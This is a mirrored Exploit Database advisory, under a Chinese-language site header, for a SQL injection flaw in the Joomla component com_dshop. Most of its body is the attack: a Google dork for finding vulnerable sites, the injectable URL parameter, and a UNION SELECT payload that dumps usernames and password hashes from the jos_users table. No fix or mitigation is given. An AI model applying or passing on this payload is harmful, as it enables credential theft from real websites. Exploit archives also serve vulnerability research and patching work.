Joomla! Component com_dshop – SQL Injection

• Exploit Database
• 10 阅读

• 作者： CoBRa_21
  日期： 2011-12-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18251/

• ################################################################################################
  #Exploit Title: Joomla Component (com_dshop) SQL Injection Vulnerability
  #
  #Author : CoBRa_21 
  #
  #E-Mail : uyku_cu [at] windowslive.com
  #
  #Google Dork : inurl:com_dshop
  #
  #Status : High-Risk
  #
  #Script Page : null
  #
  #Reference : https://www.securityfocus.com/bid/47971/info
  ################################################################################################
  #
  #SQL Vulnerability
  #
  #http://127.0.0.1/[PATH]/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 (SQL)
  #
  #SQL Exploit
  #
  #+union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users
  #
  ################################################################################################
  # ( Vulnerability Researcher ) 
  ################################################################################################